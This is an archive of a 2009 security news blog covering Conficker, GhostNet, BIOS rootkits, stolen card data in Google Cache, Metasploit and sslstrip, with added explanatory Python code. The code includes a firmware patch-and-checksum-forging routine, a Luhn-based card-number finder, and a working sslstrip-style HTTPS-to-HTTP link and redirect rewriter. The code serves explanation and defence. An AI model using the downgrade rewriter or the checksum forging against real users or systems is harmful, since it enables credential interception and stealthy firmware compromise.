Monday, March 30, 2009

103 Nations Compromised by Chinese Cyberspy Program Dubbed "GhostNet"

| Brett D. Arion |
Researchers affiliated with the Munk Centre for International Studies in Toronto have published an extensive report on the activities of what appears to be a Chinese cyber-espionage network they dub GhostNet. The investigation ran from June 2008 through March 2009 and focused on allegations that China had engaged in systematic online espionage against the Tibetan community. GhostNet was spread through a wide variety of Trojans, many of which were controlled through a program nicknamed gh0st RAT (Remote Access Tool).

Full Report can be reviewed here.

Since the report first surfaced, Chinese officials have publicly denied any involvement, in publications such as China Daily.

Additional information can be found on the F-Secure website.

Researchers release PoC tools to find Conficker

| Brett D. Arion |
Released on Dan Kaminsky's site today was a proof-of-concept scanner to help people check their networks for the presence of the Conficker worm. Kaminsky, working with the Honeynet Project's Tillmann Werner and Felix Leder, discovered that the worm changes how an infected Windows host looks on the network: the in-memory patch Conficker applies to the vulnerable service makes the host answer a specially crafted request differently from a clean machine. That means anyone can ask a system remotely, and anonymously, whether it is infected, and the system will effectively answer. The code has been released as Python scripts and also ported to a Windows binary by Kaminsky, and can be found at the link below.

Conficker Scanner PoC

In addition, it appears that some of the commercial security providers are joining in on detecting the worm. Per Kaminsky's site, "with the help of Securosis' Rich Mogull and the multivendor Conficker Working Group, enterprise-class scanners should already be out from Tenable (Nessus), McAfee/Foundstone, nmap, ncircle, and Qualys".

Given the hype around the anticipated April 1st event, when the worm begins searching for updates through its new domain-generation scheme, many are starting to wonder whether this is an elaborate April Fools' joke or the real thing. Either way, it is highly recommended that you ensure all of your systems are patched and then run either the PoC code or the enterprise-class scanners available from the companies mentioned. There will be plenty of unpatched systems that continue to propagate the worm. In addition, given this discovery, it is expected that other malicious actors will begin to exploit the "openness" of Conficker to propagate their own malware.

Thursday, March 26, 2009

Firefox XSLT exploit released to public. Mozilla announces fixes due out April 1st

| Brett D. Arion |
Update: Mozilla released the 3.0.8 update on Friday March 27, 2009.

Mozilla Security scrambled to address two critical security issues today. In a statement on its blog, Mozilla Security noted that the Pwn2Own bug discovered by Nils was reported to them through TippingPoint's Zero Day Initiative, whereas the XSLT bug, found by Guido Landi, was published publicly before a fix was available. Mozilla stated that the fixes are undergoing quality testing and are to be included in the Firefox 3.0.8 update due on April 1st.

Mozilla Security Blog

XSLT Exploit

Security focus reference for XSLT Exploit

Tuesday, March 24, 2009

Chernobyl All Over Again?

| Brett D. Arion |
No, this is not another nuclear disaster; this is more the boot-sector/BIOS invasion type of incident. After CIH (Chernobyl) broke out in 1998, manufacturers responded by write-protecting the system BIOS. That seemed sufficient until researchers from Core Security presented details at CanSecWest showing that they can replace the system BIOS on write-protected systems.

The demonstration showed that it is possible to replace the current system BIOS by taking a modified ("hacked") BIOS image, making some tweaks to its settings, reworking the checksums so the firmware's integrity check still passes, and then writing it with flashrom. This ultimately would allow one to do just about anything with an infected system, below the operating system and surviving a reinstall. There is a nagging question though: why go to all this trouble? There are much easier ways to take control of systems with a heck of a lot less effort. I also know some skeptics are saying "yeah right, but it has to be executed"... and it does need administrative privileges to reach the flash, but that seems quite easy given the rate at which people are installing malware disguised as anti-virus software or other programs. Could it be that this is a stealthy way to keep control of machines longer than the normal bot infection?
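To make the "rework the checksums" step concrete, here is an added example (my code, not Core Security's) of the 8-bit sum-to-zero checksum used by PCI option ROMs and ACPI tables, which is the layout assumed for the constructed firmware module below (real BIOS images vary). Patching any byte breaks the check, and one line of arithmetic makes it pass again. The point for defenders is that a checksum like this catches corruption, not tampering; only a reference value the attacker cannot rewrite, such as a digest or signature verified from outside the writable flash, does that.

```python
import hashlib

# Constructed sample: a 256-byte "module" whose last byte is an 8-bit checksum
# chosen so that all bytes sum to zero mod 256 (the scheme used by PCI option
# ROMs and ACPI tables; assumed here for the sample, real BIOS layouts vary).
PATCH_OFFSET = 16
PATCH = b"\xEB\xFE\x90\x90"   # constructed 4-byte patch standing in for injected code


def sum8(data: bytes) -> int:
    """8-bit sum of all bytes."""
    return sum(data) & 0xFF


def fix_checksum(data: bytes, checksum_offset: int) -> bytes:
    """Set the checksum byte so that the whole image sums to zero mod 256."""
    img = bytearray(data)
    img[checksum_offset] = 0
    img[checksum_offset] = (-sum(img)) & 0xFF
    return bytes(img)


def build_module() -> bytes:
    """Deterministic sample module with a valid checksum in its last byte."""
    body = bytes(range(255)) + b"\x00"
    return fix_checksum(body, len(body) - 1)


def checksum_ok(image: bytes) -> bool:
    """The integrity check the firmware itself performs on this sample layout."""
    return sum8(image) == 0


def naive_patch(image: bytes) -> bytes:
    """Overwrite code without touching the checksum: the check now fails."""
    img = bytearray(image)
    img[PATCH_OFFSET:PATCH_OFFSET + len(PATCH)] = PATCH
    return bytes(img)


def patch_and_fix(image: bytes) -> bytes:
    """What the attack described above does: patch, then rework the checksum."""
    return fix_checksum(naive_patch(image), len(image) - 1)


def digest(image: bytes) -> str:
    """A cryptographic digest cannot be 'reworked' by the attacker, but it only
    helps if the reference value lives where the attacker cannot rewrite it."""
    return hashlib.sha256(image).hexdigest()


if __name__ == "__main__":
    original = build_module()
    print("original checksum ok:", checksum_ok(original))
    print("naive patch checksum ok:", checksum_ok(naive_patch(original)))
    fixed = patch_and_fix(original)
    print("patched+fixed checksum ok:", checksum_ok(fixed))
    print("sha256 changed:", digest(fixed) != digest(original))
```

Running it shows the naive patch failing the check and the reworked image passing it, while the SHA-256 of the image still changes; that difference is why a write-protect bit plus a checksum is not an integrity control.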
Will the BIOS industry respond?
Can malware detection find it?

I guess only time will tell, but at least we can see that one thing is true, history always repeats itself.....oh the days of boot-sector and BIOS invasion attempts.....

Details of the Presentation can be found here, and the Abstract reads:

"When developing rootkits, one of the biggest problems is executing the malicious code, surviving reboots and remaining undetected. This talk will demonstrate how malicious code can be injected into commercial BIOS firmware. Instead of utilizing other rootkit methods which make use of the ACPI specification, Core Security has focused on a binary generic implementation independent of the installed OS to simulate how attackers can take control of a system."

Monday, March 23, 2009

Stolen information left in Google Cache

| Brett D. Arion |
According to recent accounts, an abandoned fraud site's payload of 20,000-plus credit cards ended up being discovered in Google Cache pages. The site, which was registered from within Vietnam, included all of the information for the cards listed: the card number, expiration date, and the name and address of the account holder. The cards were from major issuers such as Visa, MasterCard, American Express, Solo, and Delta. According to some reports, the information was still available as of yesterday.

Google, or any search engine that caches pages, is bound to hold this type of information. A well-formed query will quickly turn up such data on any search site, with Google ultimately offering the easiest ways to query site content (IMHO, of course). A simple query I just did as I was posting this revealed some 2,680 results, with many of them carrying the same kind of information listed here, or dumps for sale offering it. The sites range anywhere from forums that have nothing to do with this information to personal web pages.
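The same kind of search can be turned on your own exposed content. The added example below (my code, not from the Slashdot story or any of the sites involved) scans text for card-number-looking digit runs, keeps only those that pass the Luhn check, tags the issuer from the leading digits, and masks the result so a hit can be logged safely. The input is a constructed sample using the publicly documented test numbers each brand publishes for developers, not real card data.

```python
import re

# Constructed sample text; the numbers are the well-known public test numbers
# each brand publishes for developers, not real cards.
SAMPLE_DUMP = """
order 1234567812345678 shipped
Visa 4111 1111 1111 1111 exp 04/11 John Q. Public, 1 Main St
AMEX 378282246310005 exp 12/10
call 555-0100 for support
MC 5555-5555-5555-4444 exp 09/12
"""

# 13 to 19 digits, optionally separated by single spaces or dashes,
# not glued to other digits on either side.
CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check, doubling every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def issuer(digits: str) -> str:
    """Coarse brand guess from the leading digits (IIN ranges are simplified)."""
    two, four = int(digits[:2]), int(digits[:4])
    if digits[0] == "4" and len(digits) in (13, 16, 19):
        return "Visa"
    if two in (34, 37) and len(digits) == 15:
        return "American Express"
    if len(digits) == 16 and (51 <= two <= 55 or 2221 <= four <= 2720):
        return "MasterCard"
    return "unknown"


def mask(digits: str) -> str:
    """Keep the first six and last four digits, the most PCI DSS allows to be displayed."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def find_cards(text: str) -> list:
    """Return (masked_number, issuer) for every Luhn-valid candidate in text."""
    hits = []
    for m in CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append((mask(digits), issuer(digits)))
    return hits


if __name__ == "__main__":
    for masked, brand in find_cards(SAMPLE_DUMP):
        print(brand, masked)
```

The order number in the sample is rejected by the Luhn check and the phone number is too short, which is what keeps this from being a noisy "any 16 digits" grep; the masking means the tool's own output does not become a second copy of the dump.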

You can see the original post on Slashdot by clicking here, but my question to all of you is how is this perceived as a Google issue? Should the blame be more focused on the hosting provider? Would the information have still been there when the next customer received the server image?

Sunday, March 22, 2009

IRS Director of Cybersecurity Operations, Devon Bryan, to give Webcast about Securing Sensitive But Unclassified/Personally Identifiable Information.

| Brett D. Arion |
The webcast is sponsored by Government Computer News, and will be held on Wednesday, March 25, 2009 at 2:00pm EST.

Click Here to attend at the designated time.

Also, if you are looking for resources on securing information systems, the Information Assurance Support Environment (IASE) division of the Defense Information Systems Agency (DISA) offers excellent guides, checklists, and tools. Site is

Friday, March 20, 2009

Beware: New Conficker Variant has been released

| Brett D. Arion |
I know everyone is probably getting tired of hearing about this one, but it is actually very interesting to watch these propagate. It drives home the true number of people out there with computers who really have no idea what it means to update them and keep them as secure as possible. SRI International has updated their Conficker analysis to include an addendum on the new "C" variant.

On a side note, if anyone is interested in running a honeypot for malware and attack analysis, I would definitely recommend SRI's BotHunter. It is fairly straightforward to get working. The only trouble I had was with getting Snort to play nice with Ubuntu for some reason (probably one I caused). I actually ran it for some time before switching over to the DShield web honeypot, mostly because I have followed DShield for some time and just wanted to see how their project worked.

Feel free to post any experience you have had with Conficker or Honeypots in the comments section....

More Amazing content from CanSecWest: Presenters demonstrate the ability to sniff keystrokes via a laser and keyboard power

| Brett D. Arion |
Researchers and hackers never cease to amaze me with the things they come up with. We've all heard of TEMPEST in the past that allows someone to tell what is actually being displayed on a monitor by having a slew of sophisticated equipment pointed at a monitor measuring the electromagnetic radiation, but now it seems that it is possible to sniff: "keystroke vibrations using a laser trained on a shiny laptop or through electrical signals coming from a PC connected to a PS/2 keyboard and plugged into a socket." You can read the post from CNET here.

Leave us a comment and tell us of any unusual methods you have used during an engagement, or what would be some other possible avenues of hacking that have yet to be thought of.....I personally am waiting for the "lie-to-me" facial recognition effect....My boss can tell when I'm not working by having a camera trained on my face and seeing JOY instead of DISGUST...(a little humor there, I LOVE my job..;P )

Thursday, March 19, 2009

EC-Council announces a US$100,000 allocation toward an Information Security scholarship fund through EC-Council| Secure Aid™

| Brett D. Arion |
I know I can't do this one justice, so I am just going to do a direct link.

SecureAid site:


"EC-Council| Secure Aid™, the brainchild of EC-Council, strives to provide a platform for the attainment of knowledge regardless of certification affiliation and aims to support national and global security measures on combating cyber crime and cyber terrorism. EC-Council welcomes outstanding individuals who have contributed meaningfully in the IT Security domain and possess the desire to update their information security certification skills to apply for EC-Council’s scholarship. We hope to alleviate the pain of some information security professionals that have been affected by the global economic crisis and at the same time, we hope to empower the information security community and the world at large to fight cyber crime and cyber warfare.

We are proud to be vendor neutral and independent in our pursuit of empowering knowledge seekers to uphold the sanctity of their information security assets and in ensuring that every certified professional upholds the best practices in penetration testing and be in the forefront of the industry’s compliant requirements.

Therefore, EC-Council pursues with vigor the following objectives:

  • To serve our community by remaining a vendor neutral information security certification body and education provider
  • To foster excellent research skills in the field of information security
  • To encourage the development of ethical behavior within our certified community
  • To sustain creativity in implementing, managing and solving IT security related issues

Scope of Scholarship

Enrolment in the following choice of courses:

1. EC-Council Certified Ethical Hacker (C|EH);

2. EC-Council Computer Hacking Forensic Investigator (C|HFI);

3. EC-Council Certified Security Analyst (E|CSA);

4. Licensed Penetration Tester (L|PT);

5. EC-Council Certified Disaster Recovery Professional (E|DRP)

Total of 40 full and partial scholarships available totaling US$100,000

Successful candidates shall be entitled to full or partial training fees and exam voucher waiver for year 2009/2010 excluding courseware. Please click HERE for details on tuition and related fees

Duration of courses offered – 5 day live, online, instructor led training. The courses are all approximately 36 instruction hours in length delivered either in four hour time blocks, twice a week in the evening for 5 weeks, or in 5 consecutive days in 8 hour time blocks

Courses to be administered through EC-Council’s iClass (Live, Online, Instructor-led)"

Metasploit3 Update - "Tons of new Mac OS X code from Dino Dai Zovi and Charlie Miller, more to follow "

| Brett D. Arion |
It seems the Metasploit team is adding Mac OS X as a true target for Metasploit. Charlie Miller and Dino Dai Zovi showed off the new code at the CanSecWest conference, where they reportedly demonstrated one payload called "pic the vic" that takes a picture of the victim with their own camera. Now if that isn't cool... can you imagine getting a snapshot of Steve Jobs in his jammies? Check out the changeset page to see the details. According to the README: "These payloads are from "The Mac Hacker's Handbook" by Charlie Miller and Dino Dai Zovi (Wiley 2009)."

In addition to showing off the new parts of Metasploit, it seems that Charlie Miller got a little bonus of $5,000 and the MacBook that he hacked just minutes into the Pwn2Own contest. This is the second year in a row that Charlie has done this... Way to go, Charlie!!!! Unfortunately TippingPoint, one of the CanSecWest sponsors, asks the contestants to sign an NDA keeping them from publicly disclosing any vulnerabilities used in the contest, so that TippingPoint can turn the vulnerabilities over to the vendors for patching before they go public.

Happy hacking, and be sure to post any shots from "pic the vic" for all to see....

Wednesday, March 18, 2009

Unicornscan Author Jack C. Louis Dies in Tragic fire at his home in Sweden

| Brett D. Arion |
A sad time for the security industry. Famed researcher and security genius Jack C. Louis died in a tragic house fire this past weekend in Sweden. Jack is best known for writing the outstanding port scanner Unicornscan, and for his latest tool, Sockstress, which was tied to research on resource-exhaustion weaknesses in TCP implementations. More recently Jack was working as the lead security researcher for Outpost24, and he also worked with ISECOM on the Open Source Security Testing Methodology Manual (OSSTMM). Jack and his work will be sorely missed.....

(Note: There is not a lot of information about Jack on the web. If anyone has any additional information, please feel free to hit me up privately or add comments below. )

Search Terms Used: "Jack C. Louis", "", Sockstress, Unicornscan

Tuesday, March 17, 2009

Fast-Track: Pen-Testing made simple?

| Brett D. Arion |
Security engineers are always looking for easier ways to perform penetration tests. Anyone who has been doing this job for any length of time can remember the pre-Metasploit (or pre-Google, if your hair is getting gray like mine) days when you had to really know your code in order to run proof-of-concept exploits, or even the proven ones. That type of engagement often meant hours of tweaking code in order to test an exploit effectively.

OK, so what is my point you say?

Our profession, or hobby as it may be, has just received a shot in the arm with the next tool that will need to be in everyone's toolkit: FAST-TRACK. Of course, if you bill by the hour and not by the job, you probably aren't very glad to see this....just on...

So what is FAST-TRACK?

Per the website:

" Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when I was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some of my advanced attacks and propagate it down to my team at SecureState, I ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride.

"LETS POP A BOX!!!!!!!!!" -Dave Kennedy"

Old veterans like myself often dislike seeing tools like this, as it makes the hours of tedious work we have done for years seem less worthwhile (only because we did not think to script the stuff ourselves), but ultimately we must commend people like Dave Kennedy for sharing their expertise and experience with the masses. So checking out this tool is a must, but be sure to visit the Wiki page for the tool, as it explains the tool in great detail and will help you get through the setup much more effectively.

Lastly, there is an excellent video at the site as well that gives a great preview of the capabilities of Fast-Track and you can see it here.

Monday, March 16, 2009

sslstrip - Not just another way to mess with ssl

| Armando Romeo |
sslstrip is a tool and accompanying research by Moxie Marlinspike, presented at Black Hat DC 2009, that demonstrates an innovative and quite simple (to understand) way to read traffic the user believes is protected by SSL.

I spent last night watching the amazing video of Moxie's talk. At first I thought it was just another SSL MITM attack tool. Instead it turned out to be a completely new way of achieving the same result: reading SSL traffic.

The following two images will be clearer than many words:

1. This is the old sslsniff method:

sslsniff was used by Alex Sotirov et al. for the MD5 collision project presented last December 30th.

2. This is the sslstrip method, "a new kind of man in the middle" (to quote Moxie).

From the client to the attacker the connection is kept on plain HTTP, while on the server side the attacker's own connection to the real site is kept on HTTPS.

The idea behind sslstrip (downloadable here) is to turn the client's would-be HTTPS requests to the target server into plain HTTP requests, so that the client sends its data without ever encrypting it.

This is possible, according to Moxie, because there are usually two ways a connection turns from HTTP into HTTPS:
  1. 302 redirects
  2. clicking on links
So every time sslstrip intercepts a request for an HTTPS resource (such as a login page), it initiates its own secure connection to the target server, fetches the page, and responds to the client with HTML identical to the secure page retrieved from the server, except that the https:// links and redirects in it have been rewritten to http://.

The server is unaware of the attacker in the middle, since it sees a normal HTTPS client, while the attacker relies on tricks to make the client think the page he views is secure.

Firefox, as shown in the presentation, no longer colours the location bar yellow for SSL pages, and the lock favicon usually shown in SSL connections can easily be imitated by the attacker serving a padlock icon as the page's favicon.
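The rewrite step described above, as an added example (my code, not Moxie's sslstrip): a small stateful rewriter that downgrades https:// links in a fetched page and https:// Location headers in redirects to http://, and remembers which host/path pairs it has downgraded, so that when the victim later requests one of them over plain HTTP the attacker's proxy knows to fetch it from the real server over TLS. It covers only the rewriting and bookkeeping, not the listening proxy itself; the HTML snippet and the host name bank.example are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: what the real server would send back to the attacker over HTTPS.
SAMPLE_STATUS = 200
SAMPLE_HEADERS = {"Content-Type": "text/html"}
SAMPLE_BODY = (b'<html><body>'
               b'<a href="https://bank.example/login">Log in</a> '
               b'<a href="http://bank.example/help">Help</a> '
               b'<form action="https://bank.example/auth" method="post">'
               b'</form></body></html>')

# Any https:// URL up to whitespace, quotes or angle brackets.
HTTPS_URL = re.compile(rb"https://([^\s\"'<>]+)", re.IGNORECASE)


class SslStripper:
    """Downgrade https:// references to http:// and remember what was stripped."""

    def __init__(self):
        # (host, path) pairs the victim now holds as plain-HTTP links; requests for
        # these must be relayed to the origin over HTTPS, everything else as-is.
        self.stripped = set()

    def _remember(self, url: str) -> None:
        parts = urlsplit(url)
        self.stripped.add((parts.netloc.lower(), parts.path or "/"))

    def rewrite_body(self, body: bytes) -> bytes:
        """Case 2 from the description: links the user might click."""
        def downgrade(m):
            self._remember("https://" + m.group(1).decode("latin-1"))
            return b"http://" + m.group(1)
        return HTTPS_URL.sub(downgrade, body)

    def rewrite_headers(self, headers: dict) -> dict:
        """Case 1 from the description: a 302 whose Location points at https://."""
        out = dict(headers)
        loc = out.get("Location", "")
        if loc.lower().startswith("https://"):
            self._remember(loc)
            out["Location"] = "http://" + loc[len("https://"):]
        return out

    def handle_response(self, status: int, headers: dict, body: bytes):
        """Apply both rewrites to one origin response before relaying it to the victim."""
        return status, self.rewrite_headers(headers), self.rewrite_body(body)

    def upstream_scheme(self, host: str, path: str) -> str:
        """Scheme the proxy must use toward the origin for a victim's plain-HTTP request."""
        return "https" if (host.lower(), path) in self.stripped else "http"


if __name__ == "__main__":
    s = SslStripper()
    status, headers, body = s.handle_response(SAMPLE_STATUS, SAMPLE_HEADERS, SAMPLE_BODY)
    print(body.decode())
    print("next request for /login goes upstream over", s.upstream_scheme("bank.example", "/login"))
```

Note that the server-side half is an ordinary, fully valid TLS session, which is why certificate warnings never appear: the only thing the victim could notice is the missing https:// in the address bar, and the padlock trick above is aimed precisely at that.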

Results acting as a node in the Tor network:


Refer to the slides or the nice conference video for more detailed information on the attack.
